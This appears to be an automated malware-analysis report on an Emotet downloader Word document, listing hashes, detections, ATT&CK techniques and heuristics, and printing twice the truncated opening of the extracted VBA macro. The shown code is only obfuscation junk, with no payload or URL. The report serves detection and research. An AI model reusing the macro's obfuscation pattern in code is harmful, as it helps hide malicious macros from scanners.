Emotet Office (OLE) malware analysis — malicious · 5869c20a1155e356

MALICIOUS

Office (OLE)

275.5 KB Created: 2019-10-10 18:29:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: d3de976b2a1b0738f1672c8169d4ebec SHA-1: 2188f32d94596e84adde976f30be9be1743c5f5c SHA-256: 5869c20a1155e356df2e421fe8cb776cdddcd5569db139b5d3bd22838b4fd03d

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7297196-0', indicating a known Emotet variant. High-severity heuristics confirm the presence of an obfuscated auto-executing VBA loader that uses CreateObject and execution sinks. The VBA code itself is heavily obfuscated with random string concatenations and Rnd function calls, making its exact execution flow difficult to determine, but the overall pattern strongly suggests it is designed to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7297196-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7297196-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72842 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	72842 bytes
SHA-256: `318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b06411x371x13" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox" Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox" Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox" Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox" Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox" Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox" Attribute VB_Name = "b19bc018308" Function x089000cx63() On Error Resume Next b086b036433 = False 'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis b608c91x29605 = Rnd(bc90304b6cx1) x009b80x010xx = True 'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso x780802759b = Rnd(x5c5b2b08133) x5x30c057345 = False 'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland x5x05203b509b = Rnd(b24020c543x7) cx8417cc40700 = False 'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico bxx7bcb0870b = Rnd(b49b53422091) b15x0003x0899 = False 'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man c26c605095xcb = Rnd(c00c55c03c8) c4983257cb8c = True 'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala c799080b0067 = Rnd(bcx06bb294001) c2x4b31749868 = False 'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia x900cxb970260 = Rnd(x433b55143167) b4892bx449874 = False 'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea c326811256763 = False 'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala b579400cx0x00 = Rnd(cx07601b683b) c69051c09x0 = False 'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines x98118x8700 = Rnd(x4bxb080323) b20308780405 = False 'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada x6b00b3x0080 = Rnd(x042191901x) b2017046516 = True 'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname x450807240071 = Rnd(b909000909b) c9900360107c6 = False 'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland xx836cc0407 = Rnd(b91700782x9) bc02620050b94 = True 'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin c3c211168028 = Rnd(c0058000b132) cb053090048 = False 'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin b12173550c1 = Rnd(bb10000x86b03) xx60x8380090 = True 'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala c9x4110bc00b0 = True 'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal cb00c033c7005 = Rnd(c7640400064) cc700700802x = False 'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus c0416xxb4646 = Rnd(x04929400xx02) c241x0c6206 = True 'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti cx34x08046000 = Rnd(bc809082x26xx) c0c6c087038 = True 'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia c73x03cc1000 = Rnd(xc50762809500) c4x726405x9c = False 'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar x28x23536b0b = Rnd(b7154734020c) x0032x04007 = True 'In ... (truncated)

SHA-256: 318b79d8fab34cfe20777868fe182321b112c59728cafa7037c629623f7cf43f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b06411x371x13"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b660600x596, 0, 0, MSForms, TextBox"
Attribute VB_Control = "c78bc00741c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b01x002007c5, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc207bc05xb, 3, 3, MSForms, TextBox"
Attribute VB_Control = "b00b79b5219c9, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c050c04c970, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b19bc018308"
Function x089000cx63()
On Error Resume Next
   b086b036433 = False
'Future84487 Morton Plains, Devynchester, Montenegro Dynamic89206 Gibson Wells, Sporerton, Saint Kitts and Nevis
b608c91x29605 = Rnd(bc90304b6cx1)
x009b80x010xx = True
'District243 Cruickshank Row, Konopelskiside, Bangladesh Lead5008 Onie Village, Streichview, Burkina Faso
x780802759b = Rnd(x5c5b2b08133)
x5x30c057345 = False
'Senior74365 Wisoky Lake, Ryleybury, Guyana Chief374 Myrtle Viaduct, Port Katlynnmouth, Greenland
x5x05203b509b = Rnd(b24020c543x7)
cx8417cc40700 = False
'Central321 Medhurst Extensions, South Gage, Montenegro Global6190 Arvid Creek, Pfefferville, Puerto Rico
bxx7bcb0870b = Rnd(b49b53422091)
b15x0003x0899 = False
'Product084 Ruth Ville, Peterburgh, Comoros Principal389 Lera Islands, Schowalterfort, Isle of Man
c26c605095xcb = Rnd(c00c55c03c8)
c4983257cb8c = True
'Direct3406 Ashly Canyon, South Lonie, Iraq Global96417 King Stravenue, West Samarahaven, Guatemala
c799080b0067 = Rnd(bcx06bb294001)
c2x4b31749868 = False
'Forward34678 Rosalinda Underpass, Shayneton, Kyrgyz Republic Human939 Dicki Prairie, South Maxie, Indonesia
x900cxb970260 = Rnd(x433b55143167)
b4892bx449874 = False
'National841 Miller Rue, New Lawrenceburgh, Switzerland Product681 Olaf Land, North Martine, Papua New Guinea
c326811256763 = False
'Forward91603 Hudson Falls, East Dantetown, Panama Forward60262 Schmitt Ranch, Kertzmannmouth, Guatemala
b579400cx0x00 = Rnd(cx07601b683b)
c69051c09x0 = False
'Central21337 Sadie Valley, Margretstad, Bosnia and Herzegovina Investor7781 Germaine Ways, Doylefurt, Philippines
x98118x8700 = Rnd(x4bxb080323)
b20308780405 = False
'Chief2111 Orn Trace, Lemkeville, Sudan Global00123 Kovacek Dam, New Bethel, Canada
x6b00b3x0080 = Rnd(x042191901x)
b2017046516 = True
'Human107 Kris Lodge, Lake Susannaport, Zimbabwe District809 White Forks, Joyfurt, Suriname
x450807240071 = Rnd(b909000909b)
c9900360107c6 = False
'Lead9220 Carrie Club, Raynorbury, Guam Chief078 Fritsch Neck, Kielmouth, Swaziland
xx836cc0407 = Rnd(b91700782x9)
bc02620050b94 = True
'Product61627 Beatty Street, Rebamouth, Philippines Corporate979 Kenyon Union, Goldnerton, Saint Martin
c3c211168028 = Rnd(c0058000b132)
cb053090048 = False
'Future641 Jenkins Ford, Port Shannamouth, Chile Product35464 Horacio Walks, Port Guiseppeton, Benin
b12173550c1 = Rnd(bb10000x86b03)
xx60x8380090 = True
'Principal291 Waters Centers, Tianaberg, Western Sahara Product66781 Rice Plaza, New Carolyn, Guatemala
   c9x4110bc00b0 = True
'Future01192 Gerhard Course, Port Eldredtown, Svalbard & Jan Mayen Islands Senior3274 Mack Grove, East Trystan, Nepal
cb00c033c7005 = Rnd(c7640400064)
cc700700802x = False
'Central268 Rolfson Valleys, Eberthaven, Australia Human9020 Hintz Shores, New Theresehaven, Belarus
c0416xxb4646 = Rnd(x04929400xx02)
c241x0c6206 = True
'Central493 Dickens Mount, South Billymouth, Guinea Product736 Funk Meadows, South Verlamouth, Djibouti
cx34x08046000 = Rnd(bc809082x26xx)
c0c6c087038 = True
'Corporate29236 Blanda Ferry, Itzelport, Botswana International3096 Mckenzie Ville, West Bartholome, Estonia
c73x03cc1000 = Rnd(xc50762809500)
c4x726405x9c = False
'Investor48703 Doyle Squares, West Johnathonstad, Burkina Faso International75828 Viola Flat, Gerholdville, Qatar
x28x23536b0b = Rnd(b7154734020c)
x0032x04007 = True
'In
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.